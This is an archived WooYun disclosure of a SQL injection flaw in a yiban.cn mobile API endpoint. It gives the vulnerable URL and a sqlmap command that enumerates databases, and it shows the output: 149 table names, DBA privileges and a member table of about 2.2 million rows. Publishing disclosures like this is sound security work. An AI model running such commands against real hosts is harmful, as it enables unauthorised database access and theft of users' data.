当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-051308

漏洞标题:易班网某分站SQL注射漏洞

相关厂商:yiban.cn

漏洞作者: happylyang

提交时间:2014-02-18 17:11

修复时间:2014-04-04 17:11

公开时间:2014-04-04 17:11

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-02-18: 细节已通知厂商并且等待厂商处理中
2014-02-19: 厂商已经确认,细节仅向厂商公开
2014-03-01: 细节向核心白帽子及相关领域专家公开
2014-03-11: 细节向普通白帽子公开
2014-03-21: 细节向实习白帽子公开
2014-04-04: 细节向公众公开

简要描述:

客户端调用的某页面存在SQL注射

详细说明:

通过burp对易班的客户端进行抓包,burp发现了此页面可能存在sql注射
http://mobile01.yiban.cn/api/pages/v2/action.php?action=commentlist&id=1607817&sid=Ei6LyFJIV0zNNtjhnzISGnj9FI5G/0%20A4lXQNWjIbBxT70XoelvNaTczJa/SgTvUb4LQV0lwW1o=&page=1
其中id没有处理得当,导致sql注射.

漏洞证明:

sqlmap.py -u "http://mobile01.yiban.cn/api/pages/v2/action.php?action=commentlist&id=1607817&sid=Ei6LyFJIV0zNNtjhnzISGnj9FI5G/0%20A4lXQNWjIbBxT70XoelvNaTczJa/SgTvUb4LQV0lwW1o=&page=1" -p id --dbs
available databases [8]:
[*] bbscore
[*] bbscore_db
[*] DBA
[*] detection_table
[*] information_schema
[*] mysql
[*] performance_schema
[*] test


current user is DBA: True
DBA权限,其实我不会用,哈哈,但是写上它感觉高大一些。。。
Database: bbscore
[149 tables]
+------------------------+
| 21campus_main |
| 21campus_real_log |
| album |
| album_list |
| album_log |
| area |
| area_class |
| area_collection |
| area_private |
| area_rule |
| art_pool |
| art_topban |
| banner |
| banner_stat |
| banner_weibo |
| bbsvars |
| blog |
| blog_bind |
| blog_circle |
| blog_circle_album |
| blog_circle_article |
| blog_circle_classify |
| blog_circle_kind |
| blog_circle_member |
| blog_circle_message |
| blog_classify |
| blog_cssstyle |
| blog_person_vip |
| blog_relative |
| blog_rss_import_log |
| blog_siteid_log |
| blog_tag |
| blog_view |
| cal_event |
| cal_focus |
| calender |
| choose |
| choose_data |
| christmas_prize |
| citybbs |
| class_count |
| comment |
| commenttmp |
| data_sync |
| db_67_bak |
| db_67_reply_bak |
| db_attatch_bak |
| db_attatch_del_bak |
| db_attatch_tmp_bak |
| db_block_bak |
| db_count_bak |
| db_list_bak |
| db_modify_bak |
| db_opentime_bak |
| db_operlog_bak |
| db_pub_bak |
| db_view_bak |
| dbs_101_bak |
| dbs_101_reply_bak |
| dbs_101_text_bak |
| dbs_102_bak |
| dbs_102_reply_bak |
| dbs_1_bak |
| dbs_1_reply_bak |
| dbs_1_text_bak |
| dbs_28_bak |
| dbs_28_reply_bak |
| dbs_draft_bak |
| directory |
| disk_dir |
| disk_dir_t |
| disk_file |
| disk_file_t |
| disk_temp |
| eclass_comm |
| eclass_config |
| eclass_course |
| eclass_course_tmp |
| eclass_function |
| eclass_gpa |
| eclass_gpa_log |
| eclass_gpa_sort |
| eclass_info |
| eclass_member |
| eclass_new |
| eclass_school_join |
| eclass_subscription |
| egpa_monitor_tmp |
| feed_action_count |
| files |
| filter |
| flower_flow |
| food_search |
| friend |
| friend_class |
| friend_sort |
| help_cat |
| help_question |
| host_info |
| host_info_admin |
| host_jump |
| host_reg |
| icode |
| invite_user |
| loginbanner |
| market |
| market_log |
| mms_history |
| money_flow |
| msg_admin |
| msg_admin_read |
| msg_feed_comment |
| msg_forward |
| msg_system |
| msg_system_bak |
| msg_user |
| msg_user_ext |
| new_year_prize_log |
| new_year_user_allprize |
| new_year_user_log |
| notepad |
| plug_bless |
| redmovie_votedata |
| remote_login |
| report |
| report_list_accept |
| repsend_task |
| rs_report_search |
| school_count |
| session_id |
| share |
| share_file |
| share_keyword |
| share_record |
| shdyzx |
| sign |
| task_report |
| task_upload |
| temp_class |
| topic |
| user_contacts |
| user_contacts_ext |
| user_news_tags |
| vote_bak |
| vote_data_bak |
| weifilm |
| weifilm2 |
| weifilm3 |
| weifilmvote |
+------------------------+
其中找的一个表:
Table: eclass_member
+---------------+---------+
| Table | Entries |
+---------------+---------+
| eclass_member | 2202791 |
+---------------+---------+

修复方案:

版权声明:转载请注明来源 happylyang@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-02-19 09:03

厂商回复:

感谢!

最新状态:

暂无